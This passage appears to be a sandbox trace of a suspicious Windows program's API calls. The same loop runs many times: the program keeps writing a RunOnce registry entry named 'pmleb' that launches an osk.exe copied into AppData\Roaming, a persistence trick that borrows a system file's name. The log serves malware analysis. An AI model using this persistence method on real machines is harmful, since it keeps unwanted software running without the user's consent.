lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.854] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.854] RegCloseKey (hKey=0x280) returned 0x0 [0104.855] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.855] SetTimer (hWnd=0x20280, nIDEvent=0x2400, uElapse=0xa, lpTimerFunc=0x0) returned 0x2400 [0104.855] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.869] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.869] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.869] KillTimer (hWnd=0x20280, uIDEvent=0x2400) returned 1 [0104.869] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.870] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.870] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.870] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.870] RegCloseKey (hKey=0x280) returned 0x0 [0104.870] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.870] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0104.870] SetTimer (hWnd=0x20280, nIDEvent=0x2401, uElapse=0xa, lpTimerFunc=0x0) returned 0x2401 [0104.870] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.884] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.884] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.885] KillTimer (hWnd=0x20280, uIDEvent=0x2401) returned 1 [0104.885] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.885] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.885] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.886] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.886] RegCloseKey (hKey=0x280) returned 0x0 [0104.886] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.886] SetTimer (hWnd=0x20280, nIDEvent=0x2402, uElapse=0xa, lpTimerFunc=0x0) returned 0x2402 [0104.886] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.900] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.900] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.900] KillTimer (hWnd=0x20280, uIDEvent=0x2402) returned 1 [0104.900] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.900] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.901] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.901] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.901] RegCloseKey (hKey=0x280) returned 0x0 [0104.901] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.901] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.901] SetTimer (hWnd=0x20280, nIDEvent=0x2403, uElapse=0xa, lpTimerFunc=0x0) returned 0x2403 [0104.901] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.915] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.916] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.916] KillTimer (hWnd=0x20280, uIDEvent=0x2403) returned 1 [0104.916] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.916] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.916] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.917] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.917] RegCloseKey (hKey=0x280) returned 0x0 [0104.917] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.917] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.917] SetTimer (hWnd=0x20280, nIDEvent=0x2404, uElapse=0xa, lpTimerFunc=0x0) returned 0x2404 
[0104.917] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.931] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.931] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.931] KillTimer (hWnd=0x20280, uIDEvent=0x2404) returned 1 [0104.931] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.932] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.932] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.932] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.932] RegCloseKey (hKey=0x280) returned 0x0 [0104.932] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.932] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.932] SetTimer (hWnd=0x20280, nIDEvent=0x2405, uElapse=0xa, lpTimerFunc=0x0) returned 0x2405 [0104.932] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.947] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.947] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.947] KillTimer (hWnd=0x20280, uIDEvent=0x2405) returned 1 [0104.947] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.947] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.948] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.948] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.948] RegCloseKey (hKey=0x280) returned 0x0 [0104.948] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.948] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.948] SetTimer (hWnd=0x20280, nIDEvent=0x2406, uElapse=0xa, lpTimerFunc=0x0) returned 0x2406 [0104.948] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.962] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.962] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.962] KillTimer (hWnd=0x20280, uIDEvent=0x2406) returned 1 [0104.963] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.963] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.963] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.963] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.963] RegCloseKey (hKey=0x280) returned 0x0 [0104.964] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.964] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.964] SetTimer (hWnd=0x20280, nIDEvent=0x2407, uElapse=0xa, lpTimerFunc=0x0) returned 0x2407 [0104.964] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0104.999] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.000] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.000] KillTimer (hWnd=0x20280, uIDEvent=0x2407) returned 1 [0105.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.001] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.001] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.001] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.001] RegCloseKey (hKey=0x280) returned 0x0 [0105.001] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.001] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.002] SetTimer (hWnd=0x20280, nIDEvent=0x2408, uElapse=0xa, lpTimerFunc=0x0) returned 0x2408 [0105.002] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.010] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.010] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.010] KillTimer (hWnd=0x20280, uIDEvent=0x2408) returned 1 [0105.010] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.011] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.011] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.011] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.011] RegCloseKey (hKey=0x280) returned 0x0 [0105.011] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.011] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.011] SetTimer (hWnd=0x20280, nIDEvent=0x2409, uElapse=0xa, lpTimerFunc=0x0) returned 0x2409 [0105.011] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.025] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.025] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.025] KillTimer (hWnd=0x20280, uIDEvent=0x2409) returned 1 [0105.026] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.026] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.026] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.026] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.026] RegCloseKey (hKey=0x280) returned 0x0 [0105.026] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.026] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.027] SetTimer (hWnd=0x20280, nIDEvent=0x240a, uElapse=0xa, lpTimerFunc=0x0) returned 0x240a [0105.027] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.040] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.040] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.040] KillTimer (hWnd=0x20280, uIDEvent=0x240a) returned 1 [0105.041] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.041] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.041] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.041] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.042] RegCloseKey (hKey=0x280) returned 0x0 [0105.042] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.042] SetTimer (hWnd=0x20280, nIDEvent=0x240b, uElapse=0xa, lpTimerFunc=0x0) returned 0x240b [0105.042] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.056] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.056] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.056] KillTimer (hWnd=0x20280, uIDEvent=0x240b) returned 1 [0105.056] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.057] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.057] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.057] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.058] RegCloseKey (hKey=0x280) returned 0x0 [0105.058] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.058] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.058] SetTimer (hWnd=0x20280, nIDEvent=0x240c, uElapse=0xa, lpTimerFunc=0x0) returned 0x240c [0105.058] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.074] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.074] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.074] KillTimer (hWnd=0x20280, uIDEvent=0x240c) returned 1 [0105.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.075] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.075] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.075] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.076] RegCloseKey (hKey=0x280) returned 0x0 [0105.076] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.076] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.076] SetTimer (hWnd=0x20280, nIDEvent=0x240d, uElapse=0xa, lpTimerFunc=0x0) returned 0x240d [0105.076] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.087] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.088] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.088] KillTimer (hWnd=0x20280, 
uIDEvent=0x240d) returned 1 [0105.088] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.088] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.088] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.089] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.089] RegCloseKey (hKey=0x280) returned 0x0 [0105.089] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.089] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.089] SetTimer (hWnd=0x20280, nIDEvent=0x240e, uElapse=0xa, lpTimerFunc=0x0) returned 0x240e [0105.089] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.103] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.103] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.103] KillTimer (hWnd=0x20280, uIDEvent=0x240e) returned 1 [0105.103] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.103] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.104] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.104] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.104] RegCloseKey (hKey=0x280) returned 0x0 [0105.104] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.104] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.104] SetTimer (hWnd=0x20280, nIDEvent=0x240f, uElapse=0xa, lpTimerFunc=0x0) returned 0x240f [0105.104] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.118] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.118] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.119] KillTimer (hWnd=0x20280, uIDEvent=0x240f) returned 1 [0105.119] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.119] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.120] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.120] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.120] RegCloseKey (hKey=0x280) returned 0x0 [0105.120] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.120] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.120] SetTimer (hWnd=0x20280, nIDEvent=0x2410, uElapse=0xa, lpTimerFunc=0x0) returned 0x2410 [0105.120] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.135] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.135] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.135] KillTimer (hWnd=0x20280, uIDEvent=0x2410) returned 1 [0105.136] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0105.136] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.136] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.136] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.136] RegCloseKey (hKey=0x280) returned 0x0 [0105.137] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.137] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.137] SetTimer (hWnd=0x20280, nIDEvent=0x2411, uElapse=0xa, lpTimerFunc=0x0) returned 0x2411 [0105.137] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.150] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.150] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.150] KillTimer (hWnd=0x20280, uIDEvent=0x2411) returned 1 [0105.150] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.151] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.151] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.151] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.151] RegCloseKey (hKey=0x280) returned 0x0 
